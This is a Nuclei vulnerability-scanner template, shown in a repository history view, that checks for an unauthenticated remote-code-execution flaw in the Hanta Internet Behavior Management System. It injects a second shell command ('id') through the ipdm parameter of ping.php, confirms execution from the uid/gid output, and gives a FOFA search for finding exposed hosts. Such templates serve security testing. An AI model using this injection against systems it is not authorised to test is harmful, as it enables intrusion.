nuclei-templates/http/vulnerabilities/other/hanta-rce.yaml

33 lines
636 B
YAML
Raw Normal View History

id: hanta-rce
2023-08-18 05:17:32 +00:00
info:
name: Hanta Internet Behavior Management System - Remote Code Execution
2023-08-18 05:17:32 +00:00
author: momika233
severity: high
metadata:
max-request: 1
verified: true
fofa-query: app="汉塔科技上网行为管理系统"
2023-08-18 08:40:51 +00:00
tags: hanta,rce,unauth
2023-08-18 05:17:32 +00:00
http:
2023-08-18 05:17:32 +00:00
- method: GET
path:
- "{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;"
2023-08-18 05:17:32 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: word
part: header
words:
- "text/html"
2023-08-18 05:17:32 +00:00
- type: status
status:
- 200